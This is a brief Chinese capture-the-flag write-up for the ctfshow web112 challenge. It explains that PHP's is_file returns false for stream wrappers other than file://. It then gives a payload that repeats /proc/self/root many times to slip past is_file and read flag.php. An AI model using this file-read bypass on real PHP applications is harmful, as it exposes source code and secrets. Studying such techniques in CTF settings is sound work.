ctfshow web112(伪协议绕过is_file函数)
$file=$_GET['file'];
if(! is_file($file)){
highlight_file(filter($file));
}else{
echo "hacker!";
}
这里的is_file函数,在使用php的伪协议时候会返回false,除了file://协议以外。
因此可以利用的伪协议有很多这里不一一列举,详情看https://www.cnblogs.com/meng-han/p/16299548.html
都试一试咯。
当然了这里也可以利用目录溢出来做:
payload如下:
/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro
c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/var/www/html/flag.php